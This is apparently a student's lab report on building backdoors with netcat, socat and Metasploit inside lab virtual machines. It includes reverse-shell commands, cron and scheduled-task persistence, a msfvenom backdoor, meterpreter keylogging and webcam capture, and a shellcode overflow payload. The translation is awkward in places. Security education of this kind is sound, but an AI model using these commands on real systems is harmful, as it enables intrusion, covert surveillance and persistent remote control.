Content Experiments
- Use netcat obtain host operating Shell, cron start (0.5 min)
- Use socat get the host operating Shell, plans to launch the task (0.5 points)
- Use MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and runs a host acquires Shell (0.5 min)
- Use MSF meterpreter (or other software) to generate the target host acquires audio content, the camera, and the like recording keystrokes, and try to provide the right (2 minutes)
- Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (1 min) plus the contents of this experiment together written report.
Basic questions answered
-
Example you can think of possible ways to enter a backdoor on your system?
A: run a program disguised as other applications, deceive users to download.
-
How do you know that exemplified the back door to start up (win and linux) way?
A: backdoor set trigger conditions, specific arrival time, backdoor start.
Modify the Windows registry, Linux replace the network services.
-
Which gives you a deep mapping function Meterpreter there?
A: Get an audio, screen shots, be put right, steal privacy.
-
How to find yourself the system has not been installed back door?
A: Run anti-virus software, a firewall, the inspection process, ports, registry, network traffic conditions, and so on.
preparation
1. Fixed IP
-
Kali Bridge Mode virtual machine to a fixed IP: 192.168.28.129
-
Windows 10 is the host fixed IP: 192.168.0.110
2. SSH remote login
PasswordAuthentication, PermitRootLogin is yes still unable to verify the password, login failures, Internet search method, several attempts over two hours to no avail, in order not to delay the follow-up experiments, gave up the remote operation.
3. Windows get the linux shell
-
In Windows use
netcat
listens native5222
port. \nc64.exe -l -p 5222,这里用windows powershell无法直接运
行nc64.exe,需要使用.\nc64.exe
-
In linux rebound connect Windows, ,
nc 192.168.0.110 5222 -e /bin/sh
using the-e
option to performshell
procedures
4. linux obtain the Windows shell
-
In use linux end
nc -l -p 5222
instruction listening5222
port -
In Windows, use. \
nc64.exe -e powershell.exe 192.168.28.129 5222
Command reverse connection linux host5222
port -
Results: The left Windows PowerShell, the right Kali Shell
The instruction transfer data using nc
- Use under Windows. \
nc.exe -L -p 5222
Command monitor port 5222, -l command does not work, switch to online searching -L -p - linux using
nc 192.168.0.110 5222
command rebound port to connect to a Windows 5222
6. nc transfer files
-
linux Windows to transfer files
- Windows through. \
nc64.exe -l -p 5222> file1.out
Monitor port 5222 - linux rebound connection port for Windows 5222
nc 192.168.0.110 5222 < file1.in
, Windows linux can receive incoming files.
- Windows through. \
-
Similarly linux Windows to transfer files.
experiment
One
Use netcat get the host operating Shell, cron start
windows use ncat.exe -l -p 5222
listening 5222 port.
Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file.
-
crontab
Increasing a timed task instructions,-e
expressed editing. Add in the last line 50* * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh
the first 50 minutes of each period of reverse connection port Windows 5222 host. -
Time to 23:50, this time has gained Kali's shell, use ls to view directories
two
Use socat get the host operating Shell, plans to start the task
-
Right-windows, found the computer management, found in the System Tools Task Scheduler, create a task
-
常规
Fill in the task name, click触发器
and then新建触发器
set the trigger point in time.
-
In
操作
the import path socat.exe after the download, unzip, the添加参数
filltcp-listen:5222 exec:cmd.exe,pty,stderr
(tocmd.exe
bind to port 5222, the same timecmd.exe
isstderr
redirected tostdout
a) create finished, click OK.
-
To lock the computer and then re-enter the computer
socat
starts -
Kali entered in
socat - tcp:192.168.0.110:5222
(-
on behalf of the standard input and output, the second stream to port Windows 5222 host, IP for the windows of the IP), successfully cmd shell
three
Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat get transmitted to the host and run host Shell.
Explanation
Unknown problem with my win10, can not run program
After the replacement operation for Windows 7 virtual machine
Windows 7 fixed ip
- In the input command kali
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=5222 -f exe > 20175222_backdoor.exe
(IP as the kali IP) generates backdoor20175222_backdoor.exe
. - Use nc.exe -lv in Windows -p 5222> 20175222_backdoor.exe then wait.
- In kali input nc 192.168.28.131 5222 <20175222_backdoor.exe (IP for Windows here IP) generated backdoor program to the Windows host, transmission success.
-
In linux opening up another terminal,
msfconsole
enter console -
Input
use exploit/multi/handler
use monitoring module, set the payload -
When used and generated backdoor same payload:
set payload windows/meterpreter/reverse_tcp
-
set LHOST 192.168.28.129
Kali here the IP (and specified when generating backdoor same IP) -
Port number is the same:
set LPORT 5222
-
After the setup is complete,
exploit
start listening -
kali get connected to a Windows host, and got shell on the remote control
four
Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right.
-
Interception Audio:
record_mic
-
Get a camera to take pictures:
webcam_snap
Virtual machines can not be called a notebook built-in camera, the operation can not be achieved
-
Screenshots:
screenshot
-
Keystroke recording process:
keyscan_start
read keystrokes record:keyscan_dump
-
View the current user:
getuid
extracting permissions:getsystem
Additional content
MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition recall connection Shell.
-
The main steps with a test, needless to say.
Close address randomization:
execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1 //查询文件的堆栈是否可执行 more /proc/sys/kernel/randomize_va_space //查看地址随机化的状态 echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
-
gdb
debugging
-
The value of% esp + 4 = 0xffffd584
-
Whereby the code Change before injection four
\x
data. -
perl -e 'print "A" x 32;print"\x84\xd5\xff\xff\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2
-
In another terminal first start
msfconsole
-
use exploit/multi/handler 用于设置
-
payload set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1
设置IP为回环地址
-
set LPORT 4444
根据代码设置端口
-
exploit 设置完成开始监听
-
After returning the terminal to perform:
(cat input_2;cat) | ./pwn1
, successful shell.
Experiments and experience summary
Ssh problem encountered is the password can not log in, pop Permission denied, please try again, this issue stands to reason that as long as the changes to / etc / ssh / sshd_config content is PermitRootLogin yes can be resolved, but I do not know why the trial and error can not be solved, including heavy equipment ssh service, modify the contents of the file more press information. Because ssh service does not affect the experiment, so I finally give up.
It failed to exploit a start instruction in msfconsole found that use exploit / multi / handler does not take effect after reloading msfconsole resolved.
Basically the experiment did not encounter much of a problem, it can be successfully completed. The study netcat, socat, MSF meterpreter was a formal beginning to understand the technology of confrontation, I was very interested, and I hope the next course to learn more useful knowledge.